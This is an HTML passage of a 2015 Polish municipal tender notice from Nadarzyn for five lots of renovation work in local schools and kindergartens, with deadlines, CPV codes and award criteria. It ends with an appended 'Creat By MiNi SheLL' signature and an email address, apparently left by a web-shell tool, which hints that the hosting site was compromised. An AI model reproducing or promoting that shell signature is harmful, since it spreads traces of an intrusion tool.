3)	zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych przez Wykonawców według postanowień § 9 umowy,
4)	zmiany terminu realizacji umowy z powodu:
a)	przyspieszenia ukończenia robót lub usprawnienie procesu budowlanego,
b)	wystąpienia nadzwyczajnych warunków atmosferycznych w szczególności klęsk żywiołowych, uniemożliwiających prowadzenie robót budowlanych,
c)	okoliczności niezawinionych przez Wykonawcę, a w szczególności jeżeli zostały one wymuszone oczekiwaniem na uzgodnienia lub wydanie decyzji przez jakikolwiek właściwy organ (działanie lub bezczynność organów),
5)	zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia,
6)	zmiany uzasadnione okolicznościami o których mowa w art. 357 (1) Kodeksu Cywilnego,
7)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),
8)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, mimo zachowania należytej staranności przez Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nadarzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY NADARZYN, 05-830 NADARZYN, ul. MSZCZONOWSKA 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2015 godzina 10:00, miejsce: URZĄD GMINY NADARZYN, 05-830 NADARZYN, ul. MSZCZONOWSKA 24, pokój nr 100.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ                     W  MŁOCHOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są: 
ROBOTY REMONTOWE, OGÓLNOBUDOWLANE W PLACÓWKACH OŚWIATOWYCH, NALEŻĄCYCH DO GMINY NADARZYN, w tym:

Zadanie nr 1. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W MŁOCHOWIE obejmujące:
- Dostawa i montaż membrany wiatrochronnej paroprzepuszczalnej instalowanej od strony strychu
- Malowanie klasy I (Malowanie ścian i sufitów farbą lateksową odporną na szorowanie)
- Remont cokołu budynku Sali gimnastycznej
- remont opaski wokół budynku Sali gimnastycznej
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną   i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót,
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres udzielonej gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W WOLI KRAKOWIAŃSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W WOLI KRAKOWIAŃSKIEJ obejmujące:
- Remont cokołu zewnętrznego szkoły (okładzina z płytek klinkierowych - kolorystyka dostosowana do okładziny już istniejącej)
- Remont kominów - części ponad połacią dachu (rozbiórka istniejących kominów oraz wykonanie ich z cegły klinkierowej)
- Malowanie sal lekcyjnych nr 6, 7 oraz ścian szczytowych Sali gimnastycznej. Malowanie ścian i sufitów farbą lateksową odporną na szorowanie dodatkowo do wysokości 1,5m
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną    i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót 
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres udzielonej gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY obejmujące:
- Wykonanie obudowy grzejników w salach dydaktycznych, szatni oraz sali gimnastycznej
- Naprawa uszkodzonej ościeżnicy drzwi wejściowych polegająca na wymianie całej ościeżnicy (ościeżnica dostosowana do istniejącego skrzydła systemowego drewnianego z wręgiem francuskim) 
- Malowanie (pomieszczenia Sołeckiego) oraz pionu kuchennego. Malowanie ścian i sufitów farbą lateksową odporną na szorowanie dodatkowo do wysokości 1,5m
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną   i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót,
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres udzielonej gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA 
W NADARZYNIE obejmujące:
- wydzielenie altany śmietnikowej (obrodzenie wykonane z kształtowników stalowych malowanych proszkowo, dostawa i montaż furtki wejściowej wykonanej z kształtowników stalowych malowanych proszkowo oraz dostawa i montaż bramy dwuskrzydłowej umożliwiającej swobodne wprowadzanie pojemników typu BÓBR. Podłoże wyłożone kostka brukowa wraz z krawężnikami.
- montaż drzwi w pomieszczeniu piwnicy (drzwi są materiałem inwestora)
- wykonanie dwu placów zabaw o nawierzchni trawiastej (w ramach zadania należy wykonać nawodnienie systemowe  sterowane elektroniczni, Istniejące wyposażenie placów zabaw zostanie zdemontowane i po przeglądzie generalnym zainstalowane powtórnie.  

2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną                              i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót ,
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin udzielonej gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU RZEDSZKOLA W MŁOCHOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA         W MŁOCHOWIE obejmujące:
- Cyklinowanie parkietu w sali oddziału wraz z wymianą listew przyściennych i wykonaniem powłoki ochronnej olejowej
- wydzielenie części korytarza na pomieszczenie postoju wózków transportowych kuchennych, ścianką systemową przesuwną
- Wymiana drzwi zewnętrznych wejściowych - wstawienie  antywłamaniowych klasy C - 2szt
- Dostawa i montaż dodatkowej barierki stalowej malowanej proszkowo na schodach wejścia głównego.
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną   i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót,
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin udzielonej gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com